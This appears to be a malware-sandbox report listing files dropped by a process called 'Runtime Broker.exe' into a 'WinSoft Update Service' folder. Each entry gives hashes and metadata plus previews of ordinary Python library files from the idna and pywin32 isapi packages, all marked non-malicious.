Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:Aa:Aa
MD5:	1929D9F7C81F25C32830EBFE29FEC2B2
SHA1:	CF120440E59032DA490AA8FDC118B6F764FE495D
SHA-256:	8D26A0F6C103AAF48F7EDC4E432F8005F195FD14B2EE8161E33649A4E0D5F24D
SHA-512:	A3833D513EE4DDDEE80692BBA4D389B4E9E39029F7156DE4D58207899C7F625CCAFE67C8B4690895D3B16AACCA6C00AEEBB63A04C7DFF408FA5F71BF3B404685
Malicious:	false
Preview:	idna.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	58
Entropy (8bit):	4.113868658988408
Encrypted:	false
SSDEEP:	3:1LVXMi72MDXTxGzbQln:1LVX17/TxcQln
MD5:	8ACFF87EAD0244330C22125C16FCAADB
SHA1:	12DC726D536AC216BA05BB7EB8A014A5609A0DA0
SHA-256:	F4DB7BC69C9EB770E63AB3D41A8A03740C261D966ED6A500CB611A27DDE41A24
SHA-512:	A55B5EB3035D230CB7CC89BD0B7EFFAD84EB48C360EEFBB20993347B28CF3B1D75480D65A937392820AAB4081B0DB07C69B47A893CBEEF52C031F417E706939C
Malicious:	false
Preview:	from .package_data import __version__.from .core import *.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna\codec.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3299
Entropy (8bit):	4.242897540845655
Encrypted:	false
SSDEEP:	96:zBc80c8yYUVJXGzCfiGf4WZlHGzvfiOUycj4:zBEiYUvu5k3RuCdycj4
MD5:	A36C9A662F4DD0E6D8D4A48DBE68ADE5
SHA1:	A781C8B744B9FC5EAB020EDC44F3C93556F972A3
SHA-256:	96F61BEF2BBB3E102A15A00801D59CC2069623652682C794B9AFB573402C1B40
SHA-512:	21FB37491028C79683F2B04FD09FB7AB8E1FD169E548BE53120B010B4B33F0421978C909D0CDCF4F13E641027BF7248A510763C67566A1F0A61E94AB70316A0E
Malicious:	false
Preview:	from .core import encode, decode, alabel, ulabel, IDNAError.import codecs.import re.._unicode_dots_re = re.compile(u'[\u002e\u3002\uff0e\uff61]')..class Codec(codecs.Codec):.. def encode(self, data, errors='strict'):.. if errors != 'strict':. raise IDNAError("Unsupported error handling \"{0}\"".format(errors)).. if not data:. return "", 0.. return encode(data), len(data).. def decode(self, data, errors='strict'):.. if errors != 'strict':. raise IDNAError("Unsupported error handling \"{0}\"".format(errors)).. if not data:. return u"", 0.. return decode(data), len(data)..class IncrementalEncoder(codecs.BufferedIncrementalEncoder):. def _buffer_encode(self, data, errors, final):. if errors != 'strict':. raise IDNAError("Unsupported error handling \"{0}\"".format(errors)).. if not data:. return ("", 0).. labels = _unicode_dots_re.split(data). trai

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna\compat.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	232
Entropy (8bit):	4.546556797963972
Encrypted:	false
SSDEEP:	6:1LcQlBKl8bN0tyrZ9v+jLqBvtyA0v+92QyneAJFHkwIDA:1hKGFo1M2fnbHIDA
MD5:	2F0D04609DA1142C3A3F74C336EA5744
SHA1:	200367634C3CE53792BD6C0F4D7D50E6C3C842E2
SHA-256:	47E876F43FBA9AB9C9CDB5F1CA6AD6516EE2654BF2FB6E934306748A3E7B8B85
SHA-512:	3A17968829937792BFEE95F698D5779445CC56FF7541A9851065CDD5F773E4E9B7ABE02309D34B9733FE8DC33E76A582A286988DD3A153D89162BC896CD10160
Malicious:	false
Preview:	from .core import .from .codec import ..def ToASCII(label):. return encode(label)..def ToUnicode(label):. return decode(label)..def nameprep(s):. raise NotImplementedError("IDNA 2008 does not utilise nameprep protocol")..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna\core.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	11951
Entropy (8bit):	4.538231004550522
Encrypted:	false
SSDEEP:	192:wsSrsaiQc+soprOZsphBtjYVMLAayFr0266Xy5BPsN/Cxya8xtTT:w//bmMLAayFr026M1Nl
MD5:	4C71B8F90036F3A177EE082611E43867
SHA1:	450CE1849FDABF71EAB61455E7A671AA57FA3C66
SHA-256:	8C2A1A2DBDDB036B52FC30F1F4FA46B8D4C46593768C0CC1DFAF5A3FE2076111
SHA-512:	48B1CB5CEE130357141D52BECB3B887661AEB7458EF5E3F9DDC51D0756C5057A34D056D32CE81500073B21001FB0AFB2EDE72DF243955C8E9B1118AF5779CC83
Malicious:	false
Preview:	from . import idnadata.import bisect.import unicodedata.import re.import sys.from .intranges import intranges_contain.._virama_combining_class = 9._alabel_prefix = b'xn--'._unicode_dots_re = re.compile(u'[\u002e\u3002\uff0e\uff61]')..if sys.version_info[0] >= 3:. unicode = str. unichr = chr..class IDNAError(UnicodeError):. """ Base exception for all IDNA-encoding related problems """. pass...class IDNABidiError(IDNAError):. """ Exception when bidirectional requirements are not satisfied """. pass...class InvalidCodepoint(IDNAError):. """ Exception when a disallowed or unallocated codepoint is used """. pass...class InvalidCodepointContext(IDNAError):. """ Exception when the codepoint is not valid in the context it is used """. pass...def _combining_class(cp):. v = unicodedata.combining(unichr(cp)). if v == 0:. if not unicodedata.name(unichr(cp)):. raise ValueError("Unknown character in unicodedata"). return v..def _is_script(cp,

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna\idnadata.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	42350
Entropy (8bit):	3.4447742689652694
Encrypted:	false
SSDEEP:	768:WSG0YeKOB/AUeBCe9hLl24vLMSoBwv6YIc7:WTOSBCa24L0K
MD5:	1E1B60E5123A4D9BA471DD3F4BEDC4D7
SHA1:	8564A5B66F4CCF419B9390CD0C6A95DEED5FBE05
SHA-256:	826CC5C195A3766B3790A67F33FBF0CFBF8B3FF4828187D2784D37076D50A6C9
SHA-512:	375481E94FBD3176EE8A44683EF1F27812173AA75DEC97D69638577B6727D4413DDA0E85CDD28C7D38DA7A22386A9FBBE2C67227D7410E5243E8281F731C6894
Malicious:	false
Preview:	# This file is automatically generated by tools/idna-data..__version__ = "13.0.0".scripts = {. 'Greek': (. 0x37000000374,. 0x37500000378,. 0x37a0000037e,. 0x37f00000380,. 0x38400000385,. 0x38600000387,. 0x3880000038b,. 0x38c0000038d,. 0x38e000003a2,. 0x3a3000003e2,. 0x3f000000400,. 0x1d2600001d2b,. 0x1d5d00001d62,. 0x1d6600001d6b,. 0x1dbf00001dc0,. 0x1f0000001f16,. 0x1f1800001f1e,. 0x1f2000001f46,. 0x1f4800001f4e,. 0x1f5000001f58,. 0x1f5900001f5a,. 0x1f5b00001f5c,. 0x1f5d00001f5e,. 0x1f5f00001f7e,. 0x1f8000001fb5,. 0x1fb600001fc5,. 0x1fc600001fd4,. 0x1fd600001fdc,. 0x1fdd00001ff0,. 0x1ff200001ff5,. 0x1ff600001fff,. 0x212600002127,. 0xab650000ab66,. 0x101400001018f,. 0x101a0000101a1,. 0x1d2000001d246,. ),. 'Han': (. 0x2e800

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna\intranges.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1749
Entropy (8bit):	4.485549268238478
Encrypted:	false
SSDEEP:	48:wic7vy/ORhzgnc9SbrMvypoHvJgCbHmSXikyXP:pcvYcUk0oHRgCbHmOPy/
MD5:	5D37B041D01AEFD92CCAC0BFF286A7C9
SHA1:	8F1C8EDAD0338F65DACE85A9B68EA469C858427B
SHA-256:	4D8D65A7164841610FEAD36A8D9905039860A0C58E8F53819A7506F22853F3B1
SHA-512:	9B846B609E1843A14F35FE00012FC8FA6557EEBFBD9E04B3B3844CFDEB29CDC5FFE367A57E3890B36DD8BE8E9D8B8136318AC99A6BD8892665721857CAC66BA8
Malicious:	false
Preview:	""".Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).."""..import bisect..def intranges_from_list(list_):. """Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 \| end), not as tuples.. """.. sorted_list = sorted(list_). ranges = []. last_write = -1. for i in range(len(sorted_list)):. if i+1 < len(sorted_list):. if sorted_list[i] == sorted_list[i+1]-1:. continue. current_range = sorted_list[last_write+1:i+1]. ranges.append(_encode_range(current_range[0], current_range[-1] + 1)). last_write = i.. return

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna\package_data.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	22
Entropy (8bit):	3.8230679822736597
Encrypted:	false
SSDEEP:	3:cvaQOn:8aQO
MD5:	1A56C43E488B6AA863596FB0086B01B7
SHA1:	AB8451205DA5621D19BB54C983BD12BB23802A24
SHA-256:	6F1063A4B9C4D3AFF58D260A132E6CBCE32ED7333738CCED5D551BD6D3E5729D
SHA-512:	62094688F71E4092D7BA090B4ADA1364C5263619050861AFD29ADB1074B7D9E838DAF7EFE93A4D6FB328B2F90C977CF338E9EC25A9197E87D9B3A5F86F4E7B3B
Malicious:	false
Preview:	__version__ = '2.10'..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna\uts46data.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	202084
Entropy (8bit):	4.473429434416405
Encrypted:	false
SSDEEP:	3072:0K3n8iZKA6RxVW5saEIK801+xXRoROX09t:QLxepEb801UXRoAX0/
MD5:	783E04A79BB43145731B33A3372F4E05
SHA1:	823194E21B8ED155CE661CDA98A012535AF36A97
SHA-256:	94C770DB3763907D495165CF3C47C5512613DC5CA3EB46C199F2EFBF2E66EE4A
SHA-512:	5F8D73C93047FFCA7BEB45FC51DD87D5ADFE38CB309CA15FB25CF1AC5CC63C1D6F5379190F270DCE3E0294D01E7079FDC2AC02FF2A432615C139F46206D28A4B
Malicious:	false
Preview:	# This file is automatically generated by tools/idna-data.# vim: set fileencoding=utf-8 :.."""IDNA Mapping Table from UTS46."""...__version__ = "13.0.0".def _seg_0():. return [. (0x0, '3'),. (0x1, '3'),. (0x2, '3'),. (0x3, '3'),. (0x4, '3'),. (0x5, '3'),. (0x6, '3'),. (0x7, '3'),. (0x8, '3'),. (0x9, '3'),. (0xA, '3'),. (0xB, '3'),. (0xC, '3'),. (0xD, '3'),. (0xE, '3'),. (0xF, '3'),. (0x10, '3'),. (0x11, '3'),. (0x12, '3'),. (0x13, '3'),. (0x14, '3'),. (0x15, '3'),. (0x16, '3'),. (0x17, '3'),. (0x18, '3'),. (0x19, '3'),. (0x1A, '3'),. (0x1B, '3'),. (0x1C, '3'),. (0x1D, '3'),. (0x1E, '3'),. (0x1F, '3'),. (0x20, '3'),. (0x21, '3'),. (0x22, '3'),. (0x23, '3'),. (0x24, '3'),. (0x25, '3'),. (0x26, '3'),. (0x27, '3'),. (0x28, '3'),. (0x29, '3'),. (0x2A, '3'),. (0x2B, '3'),. (0x2C, '3'),. (0x2D, 'V'),. (0x2E, 'V'),. (0x2F, '3'),. (0x30, 'V'),.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\PyISAPI_loader.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	6.179697726720696
Encrypted:	false
SSDEEP:	1536:5CHaKZo7aggSU7bnYMkikAPK523zVn14:Q6u+aggSU7bzk0K523zVn1
MD5:	6C56000FF5E4342C4D904D90720F5B6A
SHA1:	7CF02EFD6911FDE56DB9DED8E872DC044225B559
SHA-256:	9868A32FF774E1B3733F02AAEFA813ABF253B2BBB3CB8D25EBF54C484A69D97B
SHA-512:	B31D5867091B2D6980119C1A511E0708CEB4F9EC37D72C37BDBF713DC17D312AB472F393D296DEB94B9B0164190310A608649B8368AC61C6A23EACB8E0D91C24
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<e.x...x...x...q\|..r...CZ..z....K.y...CZ..z...CZ..h...CZ..s..._..z....f..}...x........Z..~....Z..y....Zs.y....Z..y...Richx...........PE..L....\._...........!.....n...V.......p............8.......................................@........................................................................ ...T...........................x...@............................................text....m.......n.................. ..`.rdata...3.......4...r..............@..@.data...............................@....gfids..L...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\README.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	323
Entropy (8bit):	4.863721501858572
Encrypted:	false
SSDEEP:	6:MWNQ9OXffZSu395fJzKhFdUTmL+1TT+KjDhVJeAFiS0JWnB:MWy9OX/N9Z3T1TT+KRneAprnB
MD5:	7F3958AD30B12EC2130CBC7334AB2359
SHA1:	A6CF6266815D7C5FCD1449090F9CF3024F430107
SHA-256:	D08B643F4D500E174BA1BB17D9AB2485930957CC0168F14C8D05666FB8C3F550
SHA-512:	EBB95B6DFB9FFDD26CAF68F8C000BF8268B8BC7B843944303DAF7A85EC1936ECB17584FC846068E464826A5A4B123A623D8B67075A96FE224AE7BF26B500A7D0
Malicious:	false
Preview:	A Python ISAPI extension. Contributed by Phillip Frantz, and is.Copyright 2002-2003 by Blackdog Software Pty Ltd...See the 'samples' directory, and particularly samples\README.txt..You can find documentation in the PyWin32.chm file that comes with pywin32 - .you can open this from Pythonwin->Help, or from the start menu.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1240
Entropy (8bit):	4.463104277211742
Encrypted:	false
SSDEEP:	24:RlwjxtACqdad/YACPPNiwoKtTWZNc5b8WqAuvKMJbK:R6jxtjzCjPw4TOQb8XAnkbK
MD5:	ACF9725E16F897ECBD05857447B6C317
SHA1:	4B24BA520777CB0077C713CB7D508DFEA8B6723B
SHA-256:	BEC16D273C30E27C77B30A0F5C28D0656028E956C5C4A3FB44A58F1C89F52820
SHA-512:	FE10BBB951EF1EF4A4B65F1368B4EDD1702D8506FD71B04FC2773E725A279108D1E93F323C0514B8F7DC411A9636A0F4B67CA1D86CF895200846BA769FD08163
Malicious:	false
Preview:	# The Python ISAPI package...# Exceptions thrown by the DLL framework..class ISAPIError(Exception):. def __init__(self, errno, strerror = None, funcname = None):. # named attributes match IOError etc.. self.errno = errno. self.strerror = strerror. self.funcname = funcname. Exception.__init__(self, errno, strerror, funcname). def __str__(self):. if self.strerror is None:. try:. import win32api. self.strerror = win32api.FormatMessage(self.errno).strip(). except:. self.strerror = "no error message is available". # str() looks like a win32api error.. return str( (self.errno, self.strerror, self.funcname) ). .class FilterError(ISAPIError):. pass. .class ExtensionError(ISAPIError):. pass..# A little development aid - a filter or extension callback function can.# raise one of these exceptions, and the handler module will be reloaded..# This means you

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\doc\isapi.html Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	4160
Entropy (8bit):	4.872533696011899
Encrypted:	false
SSDEEP:	96:6AJQczz0jdpALt4DVI6HVt6Lu90PYC7drlFDeiI97qqUFXB6wpe3f04p:6hLVt6NQCxiihXMwcv04p
MD5:	F7697BC2AEAE59A9BEDFABD3192E80FF
SHA1:	BB4B1E7F5F7626F2F3DC2490931355658A6212D9
SHA-256:	0B67CC1EF06CCFD881C29DA61C775C52B634C7BCA1EAB5B19AC2A1685B0164EE
SHA-512:	06C654ED9EEE02BE94ED3FE7BB10E22A878EFCDE089916DECE2B4A305A27E7CC26FD743C31F43038AE87AB7AD1F93848E5499DF4AEC85254651833384AE585A1
Malicious:	false
Preview:	NOTE: This HTML is displayed inside the CHM file - hence some hrefs. will only work in that environment.-->.<HTML>.<BODY>.<TITLE>Introduction to Python ISAPI support</TITLE>..<h2>Introduction to Python ISAPI support</h2>..<h3>See also</h3>.<ul>. <li><a href="/isapi_modules.html">The isapi related modules</a>. </li>. <li><a href="/isapi_objects.html">The isapi related objects</a>. </li>.</ul>.<p><i>Note: if you are viewing this documentation directly from disk, .most links in this document will fail - you can also find this document in the.CHM file that comes with pywin32, where the links will work</i>..<h3>Introduction</h3>.This documents Python support for hosting ISAPI exensions and filters inside.Microsoft Internet Information Server (IIS). It assumes a basic understanding .of the ISAPI filter and extension mechanism..<p>.In summary, to implement a filter or extension, you provide a Python module.which defines a Filter and/or Extension class. Once your class ha

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\install.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	27608
Entropy (8bit):	4.786186280763216
Encrypted:	false
SSDEEP:	384:hitQo34uXFRRjkpsYNWN3x47DcYZgjMIvc41tRNMnkZ3HT0m3XhK57Vk9ujazmgl:hitQk4uENZgntRVnhK57N78
MD5:	CB914FC76D6C596E57AD4088FDD9799C
SHA1:	05EDFA989B79BDA709343172A876D6588E5B4C85
SHA-256:	813A9BFE5A520C3416BFC79C6FA02534272EC35AC15474A3531D5242010D8E83
SHA-512:	4C266E9FF9553626C279F3543DA7F97C8F72C99114AE7490C1EB61FAB75097523ADB755506A17B05A18FD2C57E20091EE33DA6DA7B28EAFD0E261DC7198274CA
Malicious:	false
Preview:	"""Installation utilities for Python ISAPI filters and extensions."""..# this code adapted from "Tomcat JK2 ISAPI redirector", part of Apache.# Created July 2004, Mark Hammond..import sys, os, imp, shutil, stat.import operator.from win32com.client import GetObject, Dispatch.from win32com.client.gencache import EnsureModule, EnsureDispatch.import win32api.import pythoncom.import winerror.import traceback.._APP_INPROC = 0._APP_OUTPROC = 1._APP_POOLED = 2._IIS_OBJECT = "IIS://LocalHost/W3SVC"._IIS_SERVER = "IIsWebServer"._IIS_WEBDIR = "IIsWebDirectory"._IIS_WEBVIRTUALDIR = "IIsWebVirtualDir"._IIS_FILTERS = "IIsFilters"._IIS_FILTER = "IIsFilter".._DEFAULT_SERVER_NAME = "Default Web Site"._DEFAULT_HEADERS = "X-Powered-By: Python"._DEFAULT_PROTECTION = _APP_POOLED..# Default is for 'execute' only access - ie, only the extension.# can be used. This can be overridden via your install script.._DEFAULT_ACCESS_EXECUTE = True._DEFAULT_ACCESS_READ = False._DEFAULT_ACCESS_WRITE = False.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\isapicon.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5221
Entropy (8bit):	4.586698580222028
Encrypted:	false
SSDEEP:	96:1qq1D+crfezmVTkZe+Cf38CzLF6P1CHpkczPhott49ssttgz8RKD338i:Z6crfoyAtCJVzPhoofRKDnx
MD5:	0037FFB92A2A1736A145937A56CBAE85
SHA1:	3F9800478B30229EB01CB5819C52A2C9C3DE21FC
SHA-256:	C08F29B178F6919DF4B133602D35D3582A9A6785723619EF59C8E0F2FFA3F05E
SHA-512:	276F85E1143B9E3194F99E5D0CA0F4A2978D92BAA81EE8B8BC6BD550D8E899F46BA11EDBCC478BD801113E686F58A24BC21E5822FE768642DD65855BB8714165
Malicious:	false
Preview:	"""Constants needed by ISAPI filters and extensions.""".# ======================================================================.# Copyright 2002-2003 by Blackdog Software Pty Ltd..# .# All Rights Reserved.# .# Permission to use, copy, modify, and distribute this software and.# its documentation for any purpose and without fee is hereby.# granted, provided that the above copyright notice appear in all.# copies and that both that copyright notice and this permission.# notice appear in supporting documentation, and that the name of .# Blackdog Software not be used in advertising or publicity pertaining to.# distribution of the software without specific, written prior.# permission..# .# BLACKDOG SOFTWARE DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,.# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN.# NO EVENT SHALL BLACKDOG SOFTWARE BE LIABLE FOR ANY SPECIAL, INDIRECT OR.# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER R

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\samples\README.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1007
Entropy (8bit):	4.529291573878237
Encrypted:	false
SSDEEP:	24:lfQBJNHeeziBykvMQFsuoWg6k2MiXYzRpc2LwNlr8ZMzoX:iNHeeoyklF1oXr0Y19GlIZMc
MD5:	862443836E56F3162633B7D1C10A3CDF
SHA1:	A3E6090FE621057F32FBC1C6E12C9CB123348FAA
SHA-256:	C47BE454FB2E9736FC6FECAB31656A3999991423D534ED7DA86B6078DFC9241E
SHA-512:	BE461DB5FEE96EECB4B11C70D993C3006B1DB768CE27D109DE027F8BF587FEB71EEC017EE650268F6C5C32D5D45D5ABB20B2386EDE5E6BD1A9408CA6F9ADEE54
Malicious:	false
Preview:	In this directory you will find examples of ISAPI filters and extensions...The filter loading mechanism works like this:.* IIS loads the special Python "loader" DLL. This DLL will generally have a . leading underscore as part of its name..* This loader DLL looks for a Python module, by removing the first letter of. the DLL base name.. .This means that an ISAPI extension module consists of 2 key files - the loader.DLL (eg, "_MyIISModule.dll", and a Python module (which for this example.would be "MyIISModule.py")..When you install an ISAPI extension, the installation code checks to see if.there is a loader DLL for your implementation file - if one does not exist, .or the standard loader is different, it is copied and renamed accordingly...We use this mechanism to provide the maximum separation between different.Python extensions installed on the same server - otherwise filter order and.other tricky IIS semantics would need to be replicated. Also, each filter.gets its own thread-pool

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\samples\advanced.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	8100
Entropy (8bit):	4.629404307496681
Encrypted:	false
SSDEEP:	192:eBcnH7yzvwWyrS9kza4VKTVaKqS2pCqzfw/xCQU30dYs/O:eanH7bXrS9kUcnS248wEkY0O
MD5:	A9C5BED78B7897ED78F66CDB54659AB5
SHA1:	4D6FF66FE41C876D33E257883E2BCAFC280889EA
SHA-256:	19D802BD6415099DD1AAFA75D5F12265A295ED97AA6874EBB6770820CDA3A87B
SHA-512:	E72DF5F3AD0E45E1A029219A64468229BF9BA0BC3A7C37CE5E4312CF11788F47A957EC9C1634AA59B1E4A7D6FD6092CDA4C066177439013DC5536AAD20669CF9
Malicious:	false
Preview:	# This extension demonstrates some advanced features of the Python ISAPI.# framework..# We demonstrate:.# * Reloading your Python module without shutting down IIS (eg, when your.# .py implementation file changes.).# * Custom command-line handling - both additional options and commands..# * Using a query string - any part of the URL after a '?' is assumed to.# be "variable names" separated by '&' - we will print the values of.# these server variables..# * If the tail portion of the URL is "ReportUnhealthy", IIS will be.# notified we are unhealthy via a HSE_REQ_REPORT_UNHEALTHY request..# Whether this is acted upon depends on if the IIS health-checking.# tools are installed, but you should always see the reason written.# to the Windows event log - see the IIS documentation for more...from isapi import isapicon.from isapi.simple import SimpleExtension.import sys, os, stat..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# Notes on reloading.# If your HttpFilter

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\samples\redirector.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4719
Entropy (8bit):	4.711818624138941
Encrypted:	false
SSDEEP:	96:sG5aXNz069zFbBxRHumKH7A2OZFcnGAQcWQYuAfQJi:sGAXNz0q191KbA2OZUQdYs9
MD5:	533B76E269EB28923D5E54AA48CA1F9E
SHA1:	7535D36F0B4F40774E3B053F5C7219EBB38EA1C9
SHA-256:	F71E11CB21CBF5DDC31AE6EB376B8C70842485D8622C02C62782527F3AE155DD
SHA-512:	90F5AFEFEC6CB907A839AD37153ADA825E18854BF8DB3215552F779C2B2608F03345C0D501B4FF57C4CB56C5C4F2D43F10418F6B32A076A644219294828813C1
Malicious:	false
Preview:	# This is a sample ISAPI extension written in Python..#.# Please see README.txt in this directory, and specifically the.# information about the "loader" DLL - installing this sample will create.# "_redirector.dll" in the current directory. The readme explains this...# Executing this script (or any server config script) will install the extension.# into your web server. As the server executes, the PyISAPI framework will load.# this module and create your Extension and Filter objects...# This is the simplest possible redirector (or proxy) we can write. The.# extension installs with a mask of '*' in the root of the site..# As an added bonus though, we optionally show how, on IIS6 and later, we.# can use HSE_ERQ_EXEC_URL to ignore certain requests - in IIS5 and earlier.# we can only do this with an ISAPI filter - see redirector_with_filter for.# an example. If this sample is run on IIS5 or earlier it simply ignores.# any excludes...from isapi import isapicon, threaded_extension.import s

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\samples\redirector_asynch.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2819
Entropy (8bit):	4.754712995623234
Encrypted:	false
SSDEEP:	48:r2mvHLf9aeJPLBZuATZhOcxerrnx8AHu/V1YKGaJxOoE8xDMczaQYuAfQ5s+nob:rVfr9ziATZpxerrxRHugBaJN5QcWQYua
MD5:	466B8504C8B41F04FA33CCBA554ACC0C
SHA1:	F827645BE8E4EA96630F8F7440BF6482BEA7C066
SHA-256:	DE7656B98AFD7C91449AADA5EF3E0CC6E0B21686B99F0E4903AA6AF0F3B2E8C6
SHA-512:	0085BCC733D84D9B789932CC2D138379077EB925338802F906AF5F7034204A2019604B68502822E0BF7E723F5F440671A1F7789AA56349D4B3F015B9F446DFAC
Malicious:	false
Preview:	# This is a sample ISAPI extension written in Python...# This is like the other 'redirector' samples, but uses asnch IO when writing.# back to the client (it does not use asynch io talking to the remote.# server!)..from isapi import isapicon, threaded_extension.import sys.import traceback.import urllib.request, urllib.parse, urllib.error..# sys.isapidllhandle will exist when we are loaded by the IIS framework..# In this case we redirect our output to the win32traceutil collector..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# The site we are proxying..proxy = "http://www.python.org"..# We synchronously read chunks of this size then asynchronously write them..CHUNK_SIZE=8192..# The callback made when IIS completes the asynch write..def io_callback(ecb, fp, cbIO, errcode):. print("IO callback", ecb, fp, cbIO, errcode). chunk = fp.read(CHUNK_SIZE). if chunk:. ecb.WriteClient(chunk, isapicon.HSE_IO_ASYNC). # and wait for the next callback to say th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\samples\redirector_with_filter.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6630
Entropy (8bit):	4.65241475426086
Encrypted:	false
SSDEEP:	192:XGHkDjoBEpCV1KYL/aPzZgI+gqehDCWUPB2qo7rIYs4c:XGED0BEpCvxL/ar0Be+B/Yhc
MD5:	A7931D3297957FA4DAC965B65687D40C
SHA1:	BE91FB3C2E694D45C85F5EE3AEEEC85DCFC36525
SHA-256:	F10954ACD8EB5EDA0B254D5CAF668BADEF72453DEFC8358E3FA18FE171549AD3
SHA-512:	2A1D9182DD05CD15DD4F8487631FB9C8CD74A01D5DE4EC0843F1837DC77D04A973C09CBD0F6113F709DFF33A0B3A36C2C593C0DDEC21E43B933EC99F8DE75689
Malicious:	false
Preview:	# This is a sample configuration file for an ISAPI filter and extension.# written in Python..#.# Please see README.txt in this directory, and specifically the.# information about the "loader" DLL - installing this sample will create.# "_redirector_with_filter.dll" in the current directory. The readme explains.# this...# Executing this script (or any server config script) will install the extension.# into your web server. As the server executes, the PyISAPI framework will load.# this module and create your Extension and Filter objects...# This sample provides sample redirector:.# It is implemented by a filter and an extension, so that some requests can.# be ignored. Compare with 'redirector_simple' which avoids the filter, but.# is unable to selectively ignore certain requests..# The process is sample uses is:.# * The filter is installed globally, as all filters are..# * A Virtual Directory named "python" is setup. This dir has our ISAPI.# extension as the only application, mapped

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\samples\test.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6315
Entropy (8bit):	4.529256776383225
Encrypted:	false
SSDEEP:	96:IsLNScJx5KY9EbV5qVE4G0p8K3aSz33q4maQFzCHzuWwKcrQU30H9QYuAfQLgvAO:IsRRVKTyaKqSDuzCHzfw/rQU30dYsUO
MD5:	64D7A11DC1815976199355BBFF18836A
SHA1:	006CBAA9AF25CC510D0712552F699730F4C2834C
SHA-256:	FEBB4C09F9AB898803028991DFB0F5BD117AD4EB14BDB421258F1821DA714592
SHA-512:	99A7CA0D95219F04E8605262A036DBEC13413B03EDE21EA1021F2ED6B0C66B09A6887398F389F5F03F264E5D2F5B5834F53E09DF12933DC688DEA982B073C904
Malicious:	false
